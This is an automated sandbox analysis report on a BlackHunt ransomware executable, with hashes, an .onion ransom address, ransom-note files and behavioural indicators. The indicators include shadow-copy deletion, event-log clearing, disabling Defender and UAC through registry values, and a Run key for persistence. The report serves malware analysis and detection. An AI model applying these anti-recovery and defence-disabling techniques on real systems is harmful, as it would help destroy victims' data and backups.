Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 23:39
Static task
static1
Behavioral task
behavioral1
Sample
6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe
Resource
win10v2004-20231215-en
General
-
Target
6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe
-
Size
707KB
-
MD5
f930c7e74d9a9daccf46b3a75e8778ba
-
SHA1
d130cee7ebf253a34b7517200f092585d7c5da5c
-
SHA256
6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6
-
SHA512
8f788fc29a73036fa51711b0ce6f5c4d54d8b2ab56fae0c76f30a1526b7e8679e1d6606e46e19e70ab596adb64eb4e9e3e702c7550beb368e53c46bb72099dd2
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1I8/vnh:6uaTmkZJ+naie5OTamgEoKxLWbXh
Malware Config
Extracted
\Device\HarddiskVolume1\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1684 fsutil.exe 1876 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 832 wevtutil.exe 1148 wevtutil.exe 2348 wevtutil.exe 2940 wevtutil.exe 2648 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 2856 bcdedit.exe 2612 bcdedit.exe 2400 bcdedit.exe 2600 bcdedit.exe -
Renames multiple (2890) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2732 wbadmin.exe 2692 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 2932 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\H: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\J: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\K: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\V: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\B: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\M: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\Q: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\S: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\P: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\N: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\W: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\E: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\I: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\Y: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\U: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\Z: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\T: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\A: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\G: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\L: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\O: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\X: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\R: 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3601492379-692465709-652514833-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_zh_4.4.0.v20140623020002.jar 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jre7\lib\jce.jar 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\MainMenuButtonIcon.png 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.security 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_zh_CN.jar 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\#BlackHunt_ReadMe.txt 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\VideoLAN\VLC\NEWS.txt 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.services_1.2.1.v20140808-1251.jar 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-text_zh_CN.jar 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\#BlackHunt_ReadMe.txt 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\#BlackHunt_ReadMe.hta 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\#BlackHunt_ReadMe.txt 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base_4.0.200.v20141007-2301.jar 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_zh_CN.jar 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Menominee 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\vlc.mo 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile.html 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+11 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Lisbon 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\#BlackHunt_ReadMe.txt 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository_1.2.100.v20131209-2144.jar 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\#BlackHunt_Private.key 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_chroma\#BlackHunt_Private.key 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ndjamena 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Porto_Velho 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_ja.jar 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+5 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\#BlackHunt_ReadMe.hta 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\El_Aaiun 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Merida 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.svg_1.1.0.v201011041433.jar 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkDrop32x32.gif 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Hermosillo 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_notes-txt-background.png 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.policy 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\#BlackHunt_ReadMe.hta 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File created C:\Program Files\Java\jre7\lib\zi\Europe\#BlackHunt_ReadMe.txt 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Thimphu 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\vlc.mo 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\#BlackHunt_ReadMe.txt 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\#BlackHunt_ReadMe.txt 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector_1.0.200.v20131115-1210.jar 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-heapdump.jar 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\#BlackHunt_Private.key 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\#BlackHunt_ReadMe.txt 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File created C:\Program Files\VideoLAN\VLC\plugins\mux\#BlackHunt_ReadMe.txt 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\7-Zip\Lang\hr.txt 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\dotslightoverlay.png 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.xml 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_ja.jar 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_zh_CN.jar 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-charts.jar 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File created C:\Program Files\VideoLAN\VLC\plugins\spu\#BlackHunt_Private.key 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_splitter\#BlackHunt_ReadMe.txt 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-previous-static.png 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 764 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2900 vssadmin.exe 1748 vssadmin.exe 792 vssadmin.exe 572 vssadmin.exe 1176 vssadmin.exe 2696 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 2704 taskkill.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 232 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1324 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe Token: SeRestorePrivilege 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe Token: SeBackupPrivilege 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe Token: SeTakeOwnershipPrivilege 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe Token: SeAuditPrivilege 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe Token: SeSecurityPrivilege 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe Token: SeIncBasePriorityPrivilege 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe Token: SeBackupPrivilege 1012 vssvc.exe Token: SeRestorePrivilege 1012 vssvc.exe Token: SeAuditPrivilege 1012 vssvc.exe Token: SeBackupPrivilege 1352 wbengine.exe Token: SeRestorePrivilege 1352 wbengine.exe Token: SeSecurityPrivilege 1352 wbengine.exe Token: SeSecurityPrivilege 2348 wevtutil.exe Token: SeSecurityPrivilege 2940 wevtutil.exe Token: SeBackupPrivilege 2348 wevtutil.exe Token: SeBackupPrivilege 2940 wevtutil.exe Token: SeSecurityPrivilege 1148 wevtutil.exe Token: SeBackupPrivilege 1148 wevtutil.exe Token: SeSecurityPrivilege 2648 wevtutil.exe Token: SeBackupPrivilege 2648 wevtutil.exe Token: SeSecurityPrivilege 832 wevtutil.exe Token: SeBackupPrivilege 832 wevtutil.exe Token: SeDebugPrivilege 2704 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2264 wrote to memory of 2548 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 29 PID 2264 wrote to memory of 2548 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 29 PID 2264 wrote to memory of 2548 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 29 PID 2264 wrote to memory of 2548 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 29 PID 2264 wrote to memory of 1216 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 31 PID 2264 wrote to memory of 1216 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 31 PID 2264 wrote to memory of 1216 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 31 PID 2264 wrote to memory of 1216 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 31 PID 2264 wrote to memory of 2340 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 34 PID 2264 wrote to memory of 2340 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 34 PID 2264 wrote to memory of 2340 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 34 PID 2264 wrote to memory of 2340 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 34 PID 2548 wrote to memory of 1148 2548 cmd.exe 33 PID 2548 wrote to memory of 1148 2548 cmd.exe 33 PID 2548 wrote to memory of 1148 2548 cmd.exe 33 PID 1216 wrote to memory of 2740 1216 cmd.exe 36 PID 1216 wrote to memory of 2740 1216 cmd.exe 36 PID 1216 wrote to memory of 2740 1216 cmd.exe 36 PID 2264 wrote to memory of 2744 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 37 PID 2264 wrote to memory of 2744 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 37 PID 2264 wrote to memory of 2744 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 37 PID 2264 wrote to memory of 2744 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 37 PID 2264 wrote to memory of 2788 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 39 PID 2264 wrote to memory of 2788 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 39 PID 2264 wrote to memory of 2788 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 39 PID 2264 wrote to memory of 2788 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 39 PID 2264 wrote to memory of 2724 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 41 PID 2264 wrote to memory of 2724 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 41 PID 2264 wrote to memory of 2724 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 41 PID 2264 wrote to memory of 2724 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 41 PID 2264 wrote to memory of 2728 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 42 PID 2264 wrote to memory of 2728 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 42 PID 2264 wrote to memory of 2728 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 42 PID 2264 wrote to memory of 2728 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 42 PID 2264 wrote to memory of 2888 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 45 PID 2264 wrote to memory of 2888 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 45 PID 2264 wrote to memory of 2888 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 45 PID 2264 wrote to memory of 2888 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 45 PID 2340 wrote to memory of 2712 2340 cmd.exe 46 PID 2340 wrote to memory of 2712 2340 cmd.exe 46 PID 2340 wrote to memory of 2712 2340 cmd.exe 46 PID 2264 wrote to memory of 2756 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 47 PID 2264 wrote to memory of 2756 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 47 PID 2264 wrote to memory of 2756 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 47 PID 2264 wrote to memory of 2756 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 47 PID 2788 wrote to memory of 2632 2788 cmd.exe 48 PID 2788 wrote to memory of 2632 2788 cmd.exe 48 PID 2788 wrote to memory of 2632 2788 cmd.exe 48 PID 2264 wrote to memory of 2460 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 49 PID 2264 wrote to memory of 2460 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 49 PID 2264 wrote to memory of 2460 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 49 PID 2264 wrote to memory of 2460 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 49 PID 2744 wrote to memory of 3028 2744 cmd.exe 50 PID 2744 wrote to memory of 3028 2744 cmd.exe 50 PID 2744 wrote to memory of 3028 2744 cmd.exe 50 PID 2264 wrote to memory of 2900 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 144 PID 2264 wrote to memory of 2900 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 144 PID 2264 wrote to memory of 2900 2264 6912b70bb445afd2bb975512febb8d6037ddb4b841de1cac224a63e4e3d24fe6.exe 144 PID 2264 wrote to memory of 